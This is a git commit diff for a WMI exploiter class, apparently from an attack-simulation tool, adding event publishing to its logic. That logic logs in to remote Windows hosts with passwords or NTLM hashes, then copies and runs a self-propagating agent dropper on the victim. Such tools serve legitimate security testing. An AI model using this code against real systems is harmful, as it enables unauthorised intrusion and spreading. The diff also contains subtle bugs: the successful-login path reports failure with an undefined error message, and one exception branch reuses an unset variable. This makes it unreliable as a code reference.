Agent: Publish events from WMI
This commit is contained in:
parent
4709ae771b
commit
ed191bcf61
|
@ -2,6 +2,7 @@ import logging
|
|||
import ntpath
|
||||
import socket
|
||||
import traceback
|
||||
from time import time
|
||||
|
||||
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
||||
|
||||
|
@ -44,6 +45,7 @@ class WmiExploiter(HostExploiter):
|
|||
|
||||
wmi_connection = WmiTools.WmiConnection()
|
||||
|
||||
timestamp = time()
|
||||
try:
|
||||
wmi_connection.connect(
|
||||
self.host,
|
||||
|
@ -55,26 +57,34 @@ class WmiExploiter(HostExploiter):
|
|||
)
|
||||
except AccessDeniedException:
|
||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||
logger.debug(f"Failed connecting to {self.host} using WMI")
|
||||
error_message = f"Failed connecting to {self.host} using WMI"
|
||||
logger.debug(error_message)
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
continue
|
||||
except DCERPCException:
|
||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||
logger.debug(f"Failed connecting to {self.host} using WMI")
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
continue
|
||||
|
||||
except socket.error:
|
||||
logger.debug(f"Network error in WMI connection to {self.host}")
|
||||
error_message = f"Network error in WMI connection to {self.host}"
|
||||
logger.debug(error_message)
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
return self.exploit_result
|
||||
|
||||
except Exception as exc:
|
||||
logger.debug(
|
||||
error_message = (
|
||||
f"Unknown WMI connection error to {self.host}: "
|
||||
f"{exc} {traceback.format_exc()}"
|
||||
)
|
||||
logger.debug(error_message)
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
return self.exploit_result
|
||||
|
||||
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
|
||||
self.exploit_result.exploitation_success = True
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
|
||||
downloaded_agent = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
|
||||
|
||||
|
@ -113,33 +123,30 @@ class WmiExploiter(HostExploiter):
|
|||
} + build_monkey_commandline(self.servers, self.current_depth + 1)
|
||||
|
||||
# execute the remote monkey
|
||||
propagation_timestamp = time()
|
||||
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(
|
||||
cmdline, ntpath.split(remote_full_path)[0], None
|
||||
)
|
||||
|
||||
if (0 != result.ProcessId) and (not result.ReturnValue):
|
||||
logger.info(
|
||||
"Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)",
|
||||
remote_full_path,
|
||||
self.host,
|
||||
result.ProcessId,
|
||||
cmdline,
|
||||
f"Executed dropper '{remote_full_path}' on remote victim {self.host} "
|
||||
f"(pid={result.ProcessId}, cmdline={cmdline})"
|
||||
)
|
||||
|
||||
self.add_vuln_port(port="unknown")
|
||||
self.exploit_result.propagation_success = True
|
||||
self._publish_propagation_event(propagation_timestamp, True)
|
||||
else:
|
||||
error_message = (
|
||||
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
|
||||
"cmdline=%r)",
|
||||
remote_full_path,
|
||||
self.host,
|
||||
result.ProcessId,
|
||||
result.ReturnValue,
|
||||
cmdline,
|
||||
f"Error executing dropper '{remote_full_path}' on remote victim {self.host} "
|
||||
f"(pid={result.ProcessId}, exit_code={result.ReturnValue}, cmdline={cmdline})"
|
||||
)
|
||||
logger.debug(error_message)
|
||||
self.exploit_result.error_message = error_message
|
||||
self._publish_propagation_event(
|
||||
propagation_timestamp, False, error_message=error_message
|
||||
)
|
||||
|
||||
result.RemRelease()
|
||||
wmi_connection.close()
|
||||
|
|
Loading…
Reference in New Issue